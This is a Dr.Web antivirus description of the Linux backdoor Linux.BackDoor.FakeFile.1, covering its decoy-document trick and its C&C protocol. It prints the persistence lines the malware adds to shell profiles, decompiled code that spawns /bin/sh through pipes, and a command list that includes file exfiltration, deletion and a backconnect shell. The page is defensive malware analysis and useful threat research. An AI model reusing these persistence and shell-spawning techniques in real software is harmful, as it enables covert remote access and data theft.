Library
My library

+ Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets

Profile

Linux.BackDoor.FakeFile.1

Added to the Dr.Web virus database: 2016-10-14

Virus description added:

SHA1:

  • 0138fc4d50c734e288388f7c8cbbea5e2ad08a8b

A backdoor for Linux. Upon launching, it copies itself to the file

<HOME>/.gconf/apps/gnome-common/gnome-common

It then searches for a hidden file, whose name matches the file name of the Trojan, and replaces the executable file with it. For instance, if an ELF file of Linux.BackDoor.FakeFile.1 is named AnyName.pdf, the Trojan will search for a hidden file under the name .AnyName.pdf and then replace the original file with it by using the command mv.

If the file is found, the Trojan opens the respective application to view the file:

Extensionapplication
".doc .DOC .xls. XLS .ppt .PPT .docx .DOCX .xlsx .XLSX .pptx .PPTX .odt .ODT .ods .ODS .odp .ODP"soffice
".pdf .PDF"evince
the rest isgedit

If the file is absent, the Trojan creates it and opens in the program gedit. The Trojan then checks the name of the Linux distribution installed on the device: if the name is something other than openSUSE, Linux.BackDoor.FakeFile.1 writes the following strings to the file <HOME>/.profile or the file <HOME>/.bash_profile:

# if execute the gnome-common
if [ -d "$HOME/.gconf/apps/gnome-common/" ] ; then
    "$HOME/.gconf/apps/gnome-common/gnome-common"
fi

The program for viewing the file and the its own copy is launched as follows:

pipe(v32);
pipe(v31);
status = fork();
if ( !status )
{
  close(0);
  dup(v31[0]);
  close(1);
  dup(v32[1]);
  close(2);
  dup(v32[1]);
  close(v32[1]);
  close(v31[0]);
  close(v32[0]);
  close(v31[1]);
  sleep(1u);
  while ( execl("/bin/sh", "/bin/sh", 0) < 0 )
    sleep(1u);
  exit(status);
}
v50 = dup(0);
v51 = dup(1);
v52 = dup(2);
close(0);
dup(v32[0]);
close(1);
dup(v31[1]);
close(v31[1]);
close(v32[0]);
close(v31[0]);
close(v32[1]);
write(1, s1, strlen(s1));
write(1, &unk_8053D40, 1u);

If the Trojan is launched from the folder <home>/.gconf/apps/gnome-common/gnome-common, it retrieves the configuration data from its file and decrypts it. After that, the malware program launches two threads: the first shares information with the command and control (C&C) server, and the second monitors the duration of the connection. If the Trojan goes for more than 30 minutes without receiving instructions, the connection is broken. When sharing information with the C&C server, the server’s replies are disguised under HTTP requests that looks as follows:

GET /index.asp?title=Welcome&picture=welcome.gif<encrypted string>
HTTP/1.0
Host: <IP address of a victim>
User-Agent: Mozilla/4.0
Connection: Keep-Alive
Accept: * /*
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Pragma: no-cache

Linux.BackDoor.FakeFile.1 can execute the following commands:

NameFunction
RRSend the C&C server the quantity of messages transferred during the session;
DRSend a list of the contents of the specified folder;
DFSend the C&C server the specified file or a folder with all its contents;
D1Delete a file using the command rm –r
D0Delete a file using the command unlink
RFRename a folder;
USRemove itself
RPLaunch a new copy of a process
QQClose the current session
RTEstablish backconnect and run sh
CPTerminate the backdoor’s operation
FFOpen the executable file of the process for writing
COClose the process file
BFCreate a file or folder
FDWrite the transmitted values to a file
EFObtain the directory listing by using the command ls
CXSet 777 privileges on the specified file
CRTerminate backconnect

News about the Trojan

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number